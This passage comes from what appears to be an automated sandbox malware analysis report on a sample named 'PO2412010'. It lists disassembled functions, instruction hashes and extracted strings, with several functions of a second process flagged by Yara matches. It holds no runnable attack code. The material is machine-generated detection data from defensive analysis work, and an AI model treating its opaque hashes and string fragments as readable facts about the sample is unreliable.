                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ecc8b6fdab129d885e79e04da646e822c7d3a8bc70a5a2ad5553fd6bc7e2047b
                                                                        • Instruction ID: 6eef50577d41cd8a29b1b12c492fa4c5897abcfa5dde4d2003e6a6e5a4bf1a37
                                                                        • Opcode Fuzzy Hash: ecc8b6fdab129d885e79e04da646e822c7d3a8bc70a5a2ad5553fd6bc7e2047b
                                                                        • Instruction Fuzzy Hash: 6090022530181402D102715844146060019D7D1345F96C012E1434556DC6298A53A233
                                                                        Function 01AC3090 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f1af69c0cb34694a7920805e68a6d40ecc35aee35a9d2d879470fe962523958e
                                                                        • Instruction ID: 834cfee3a10a57b4136a4e8dc50938f4d78d23881b9333b340a75dc1fd598999
                                                                        • Opcode Fuzzy Hash: f1af69c0cb34694a7920805e68a6d40ecc35aee35a9d2d879470fe962523958e
                                                                        • Instruction Fuzzy Hash: 7990022524181802D140715884147070016D7D0601F56C011E0034555DC61A8A6567B2
                                                                        Function 01AC3010 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 621bd749285ad5e122cb5c3177b3ff3dad48a30eaa66f5dbea230d88976de90d
                                                                        • Instruction ID: 7aa6069a251ba358f20619f90c3205f8b265ff1efd70dbc23b7852df2ecf4b41
                                                                        • Opcode Fuzzy Hash: 621bd749285ad5e122cb5c3177b3ff3dad48a30eaa66f5dbea230d88976de90d
                                                                        • Instruction Fuzzy Hash: 90900225201C5442D14072584804B0F411597E1202F96C019E4166555CC91989555722
                                                                        Function 01AC39B0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7df059961e56a821bbc4dc76e36e14bb913129f79363c3301b55b4efb8e29a06
                                                                        • Instruction ID: 1f0426c6498dce1a2c560c06bb39db167ad9faedf4a8049e7815d29c04ab00b0
                                                                        • Opcode Fuzzy Hash: 7df059961e56a821bbc4dc76e36e14bb913129f79363c3301b55b4efb8e29a06
                                                                        • Instruction Fuzzy Hash: 3290022524586102D150715C44046164015B7E0201F56C021E0824595DC55989556322
                                                                        Function 01AC3D10 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: feb1316d4b7ea446c4c0d048be4f2e8926dd7179cb6499c6f1733e9ebbf9e328
                                                                        • Instruction ID: 9f17772e7789d7ed4b377b5a239130287ae22344593e41a05d5ddfc1f6d8d8a1
                                                                        • Opcode Fuzzy Hash: feb1316d4b7ea446c4c0d048be4f2e8926dd7179cb6499c6f1733e9ebbf9e328
                                                                        • Instruction Fuzzy Hash: 4590023520281142954072585804A4E411597E1302F96D415E0025555CC91889615322
                                                                        Function 01AC3D70 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: db084da5a6c22e0fccb9e68aea98a3434702db473153c81b504c5bd2b37fd967
                                                                        • Instruction ID: 4439c7cd622992b50bb4aed7d97ba8fb7ed4f1d5b1d36932c0085e64a064144e
                                                                        • Opcode Fuzzy Hash: db084da5a6c22e0fccb9e68aea98a3434702db473153c81b504c5bd2b37fd967
                                                                        • Instruction Fuzzy Hash: 6490023920181402D51071585804646005697D0301F56D411E0434559DC65889A1A222
                                                                        Function 01AC2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction ID: 290c2a41f55d50635b59beb6cec6152205e150e179ef3aaa3b3432a6ba2cc700
                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction Fuzzy Hash:
                                                                        Function 01AC2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                        • API String ID: 48624451-2108815105
                                                                        • Opcode ID: d71441e66092c3583d97b15a18b35f0e5eae9b38a3754197bd7481fab01cf46a
                                                                        • Instruction ID: 187872ee3c30fb6e3d875e6b3cb0ae8351a7ec07213a448ca4247c75433bc7e4
                                                                        • Opcode Fuzzy Hash: d71441e66092c3583d97b15a18b35f0e5eae9b38a3754197bd7481fab01cf46a
                                                                        • Instruction Fuzzy Hash: 1851E7B6A00116BFDB11DBAC8D90ABEFBB8BB08640B14C16EF569D7641D334DE4087E0
                                                                        Function 01B32410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                        • API String ID: 48624451-2108815105
                                                                        • Opcode ID: ab617de52a096a0037f46dc1295153a8a30ee152c6938bf3a92383f682215b76
                                                                        • Instruction ID: 8958d8776de3357f460890645d99f54ece4b207878cdcb1af6202c195e653d7f
                                                                        • Opcode Fuzzy Hash: ab617de52a096a0037f46dc1295153a8a30ee152c6938bf3a92383f682215b76
                                                                        • Instruction Fuzzy Hash: 6F51F471A00646AEDF39DE6CCD9097EBBF8EF84200B4584D9E596C7681E774EB108760
                                                                        Function 01AB7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01AF46FC
                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01AF4655
                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01AF4725
                                                                        • Execute=1, xrefs: 01AF4713
                                                                        • ExecuteOptions, xrefs: 01AF46A0
                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01AF4742
                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01AF4787
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                        • API String ID: 0-484625025
                                                                        • Opcode ID: 9c7f5b0d24bf1a5a1f01b055115edc68be8f0889acec4c87de5520432cc5b875
                                                                        • Instruction ID: c8c907426938031c69dea85e3103f4b43bfe5e15b4cadf3a784202803f7bf880
                                                                        • Opcode Fuzzy Hash: 9c7f5b0d24bf1a5a1f01b055115edc68be8f0889acec4c87de5520432cc5b875
                                                                        • Instruction Fuzzy Hash: 3E510A316002597AEF25ABE9DCD5FFA7BBCEB58704F04009DE605A71C2EBB09A458B50
                                                                        Function 01B56940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                        • Instruction ID: 648ff26626f37af6ab8fbcb487113fa009134b3b8ebcb949f6eaa91bb0ac032e
                                                                        • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                        • Instruction Fuzzy Hash: FB023871508382AFD749CF28C590B6BBBE5EFC8704F448A6DF9898B250DB31E945CB42
                                                                        Function 01ACB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: __aulldvrm
                                                                        • String ID: +$-$0$0
                                                                        • API String ID: 1302938615-699404926
                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                        • Instruction ID: 46c36e2d9191fbe8f01bf6e8da35e5895ff8769a583729f82cda1699fed62579
                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                        • Instruction Fuzzy Hash: A2819F70E062499EEF25CF6CC8527AEBBB1AF45BA0F1C415DD861A72D1C73698408B71
                                                                        Function 01B320E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: %%%u$[$]:%u
                                                                        • API String ID: 48624451-2819853543
                                                                        • Opcode ID: 8abbc0bc6af5df21f7af5e1d1991f7596ef1337668d9839c2059df25cc2bc522
                                                                        • Instruction ID: c41107f3e2670e67a43fb3e67211923b51889fc1741695682d9a9484ca7d0440
                                                                        • Opcode Fuzzy Hash: 8abbc0bc6af5df21f7af5e1d1991f7596ef1337668d9839c2059df25cc2bc522
                                                                        • Instruction Fuzzy Hash: 3021567AA00519ABDB15DE69CD41AEEBBF8EF94650F04019AE905D3200E73099118B91
                                                                        Function 01AAF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01AF02BD
                                                                        • RTL: Re-Waiting, xrefs: 01AF031E
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01AF02E7
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                        • API String ID: 0-2474120054
                                                                        • Opcode ID: 40a7461b59765d2442a3bbece38d03093c15d37e23374b954a12940c3707c532
                                                                        • Instruction ID: 4fc823c755d2ec9385c3fd6332e53d023e17920eb50b6b084323544dc1c6364a
                                                                        • Opcode Fuzzy Hash: 40a7461b59765d2442a3bbece38d03093c15d37e23374b954a12940c3707c532
                                                                        • Instruction Fuzzy Hash: 75E1BE306087419FE729CF68C984B2ABBE1FB88714F540A5DF6A5CB2E2D774D844CB52
                                                                        Function 01ABBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • RTL: Resource at %p, xrefs: 01AF7B8E
                                                                        • RTL: Re-Waiting, xrefs: 01AF7BAC
                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01AF7B7F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                        • API String ID: 0-871070163
                                                                        • Opcode ID: ac45a01d19df78601a56ed8c0504a160f0efbd2eb5d1c0127a0b60646f798ba9
                                                                        • Instruction ID: a99958c07414f2379cba7b4ea1803a27b62454e398f41a1c5f33cf97aa57b2d5
                                                                        • Opcode Fuzzy Hash: ac45a01d19df78601a56ed8c0504a160f0efbd2eb5d1c0127a0b60646f798ba9
                                                                        • Instruction Fuzzy Hash: 9341F6313047469FDB25DF29C880BAAB7E9EF89710F000A1DFA56D7281DB31E805CBA1
                                                                        Function 01ABB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AF728C
                                                                        Strings
                                                                        • RTL: Resource at %p, xrefs: 01AF72A3
                                                                        • RTL: Re-Waiting, xrefs: 01AF72C1
                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01AF7294
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                        • API String ID: 885266447-605551621
                                                                        • Opcode ID: e29ca5bbfbd3e6b88ed4df51841f9f508410f26dd643cdb762a1c9a5dce9fa74
                                                                        • Instruction ID: e73cba7e14b53fb429455e1b1ec0c411c5a54628fa2d31bfd293338714a1cd75
                                                                        • Opcode Fuzzy Hash: e29ca5bbfbd3e6b88ed4df51841f9f508410f26dd643cdb762a1c9a5dce9fa74
                                                                        • Instruction Fuzzy Hash: D4411235700246ABD721DFA9CC81FAAB7A9FB54710F14061DFA55AB281DB30F80287E1
                                                                        Function 01B32300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: %%%u$]:%u
                                                                        • API String ID: 48624451-3050659472
                                                                        • Opcode ID: db68dd52fcc960437fda587307ee9e8caeddbd813a925ba9612a9af7b418f18d
                                                                        • Instruction ID: f633fbccf8e80b8909cc6b75dab51353298d4b0a707a7aae55b4c979b3fdf09b
                                                                        • Opcode Fuzzy Hash: db68dd52fcc960437fda587307ee9e8caeddbd813a925ba9612a9af7b418f18d
                                                                        • Instruction Fuzzy Hash: 43316672A00619AFDB24DE2DDD80BEE77F8FF54610F4545D9E949E3240EB30AA548BA0
                                                                        Function 01AC7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: __aulldvrm
                                                                        • String ID: +$-
                                                                        • API String ID: 1302938615-2137968064
                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                        • Instruction ID: 3c7af0b7b468f4269b353c3202186fda01c328c225eb160b32fdc6bf15d91089
                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                        • Instruction Fuzzy Hash: E491A071E0021A9AEB25DFADC8806BEBBB5BF44B20F54451EE955A72C0D7348940CF91
                                                                        Function 01A89126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$@
                                                                        • API String ID: 0-1194432280
                                                                        • Opcode ID: d022b02cb4e764064481e74b97ba20ec46e4d2af4299b08cdd7ec664fb704425
                                                                        • Instruction ID: d2cd1d86d922572825d1c12c41abc9dde171c7170946431258cf3937f74ed014
                                                                        • Opcode Fuzzy Hash: d022b02cb4e764064481e74b97ba20ec46e4d2af4299b08cdd7ec664fb704425
                                                                        • Instruction Fuzzy Hash: 5C811A71D002699BDB35DB54CD44BEEBBB8AF48714F0441EAEA19B7640E7709E84CFA0

                                                                        Executed Functions

                                                                        Function 03193E52 Relevance: 25.4, Strings: 20, Instructions: 372COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: j$$=$($8^$=$L7$O5$Z$[$[$[5$]$d&$fX$k^$q$sw$y$}$4
                                                                        • API String ID: 0-2360868250
                                                                        • Opcode ID: 160b7acae23fb1581e619454387592f53d2d78e977d5b50a8b49934407a36916
                                                                        • Instruction ID: 13ac75bfb71e10339da4c47009948ff910d2b67a39b827bef7a7fce2c73d132b
                                                                        • Opcode Fuzzy Hash: 160b7acae23fb1581e619454387592f53d2d78e977d5b50a8b49934407a36916
                                                                        • Instruction Fuzzy Hash: DC12E274E05229CBEF28CF5AC8547DDBBB2BF49308F1481DAD0596B281CBB55A86CF41
                                                                        Function 031A1902 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6$O$S$\$s
                                                                        • API String ID: 0-3854637164
                                                                        • Opcode ID: b7d0034783b993231ae93bba56965397c5b8b96306e4b5aa6429389a8463abe2
                                                                        • Instruction ID: 538b45e0f0376f068a73f7d2d299d0b639af996c07aecda6ba393ec88d989b75
                                                                        • Opcode Fuzzy Hash: b7d0034783b993231ae93bba56965397c5b8b96306e4b5aa6429389a8463abe2
                                                                        • Instruction Fuzzy Hash: 9D51A276D01318AFDB10DFD8DC45EEAB3B8EF98311F1481A9E9095B141E7749A44CBA1
                                                                        Function 031AEB92 Relevance: 2.5, Strings: 2, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "1$~!
                                                                        • API String ID: 0-4146445991
                                                                        • Opcode ID: 639cc635f774ca0338b75a683a153f6e21b4ced9507b621540147d22da56499b
                                                                        • Instruction ID: 87ae8fc5134320652be0a2c674fd7e8aa7033cd512aed164f82479f42d610030
                                                                        • Opcode Fuzzy Hash: 639cc635f774ca0338b75a683a153f6e21b4ced9507b621540147d22da56499b
                                                                        • Instruction Fuzzy Hash: 4701D7B6C01218AF9B40EFE9D9419EEBBF8AB1C200F14466AD515F6200F7705A048FA4
                                                                        Function 031AEC22 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "
                                                                        • API String ID: 0-1165748306
                                                                        • Opcode ID: 9a43477422ecfde0ed53a9224819f6ab075015e11c3c32de38f19afbf712c515
                                                                        • Instruction ID: b08473356a1565282ba2adf4e9a459bdf2a4457928648b0fbfa27c26534cf810
                                                                        • Opcode Fuzzy Hash: 9a43477422ecfde0ed53a9224819f6ab075015e11c3c32de38f19afbf712c515
                                                                        • Instruction Fuzzy Hash: 3321FEB6D01219AF8B00DFE9D9419EFB7F9EF88610F14426AE915E7204E7719A148BE0
                                                                        Function 031AFF62 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6r
                                                                        • API String ID: 0-1993249690
                                                                        • Opcode ID: 5a475c1fd64906f5f025767121e17dd43e83d4b976390659b15a8ec84352b1bd
                                                                        • Instruction ID: 7d7ae173bdacedf5e1d3b4cc991fe0064c412507b162883206efc08fd083e23b
                                                                        • Opcode Fuzzy Hash: 5a475c1fd64906f5f025767121e17dd43e83d4b976390659b15a8ec84352b1bd
                                                                        • Instruction Fuzzy Hash: 501112B6D0121CAF9B00DFE9D8419EEB7F9EF4D210F14416AE909E7200E7759A05CBE1
                                                                        Function 0318D4BA Relevance: .1, Instructions: 139COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 172d40cec3b3a5eac5f770f6a501fa752952d69f340a6b9c25a6cf4fc7e51e65
                                                                        • Instruction ID: c1eaf0192706fdd96e55a1e440824f4768159552263ada19f1138353c69f631c
                                                                        • Opcode Fuzzy Hash: 172d40cec3b3a5eac5f770f6a501fa752952d69f340a6b9c25a6cf4fc7e51e65
                                                                        • Instruction Fuzzy Hash: C14138B1D11218AFDB00DF99D881AEEBBBCEF4D710F10415AFA14E6240E3B49A45CBA4
                                                                        Function 031B2372 Relevance: .1, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cf6ed1507c048202a8380901b20853abf16bc6de9ff7b6f9047b8a115ef48fb3
                                                                        • Instruction ID: 2a88c1a99144cce244c4c9546d3b2373a51666f61c0c7bcaf174af2803639f4c
                                                                        • Opcode Fuzzy Hash: cf6ed1507c048202a8380901b20853abf16bc6de9ff7b6f9047b8a115ef48fb3
                                                                        • Instruction Fuzzy Hash: 5F31E7B5A00609AFDB14DF99DC41EEFB7B9EF8C300F108619F918AB241D774A911CBA5
                                                                        Function 031B2CC2 Relevance: .1, Instructions: 77COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5d70121d21914185a18db6d01ed80ca7d508067f521cbbc7796229021d8daec4
                                                                        • Instruction ID: 8700cad35bd02ff72d3ad2da282414a3f3fe716cb0e90ab233098cde73d760b8
                                                                        • Opcode Fuzzy Hash: 5d70121d21914185a18db6d01ed80ca7d508067f521cbbc7796229021d8daec4
                                                                        • Instruction Fuzzy Hash: 202127B5A00609ABDB10DF68CC41EEBB7B8EF88300F10461DF9189B241DB74A911CBA5
                                                                        Function 031A1742 Relevance: .1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
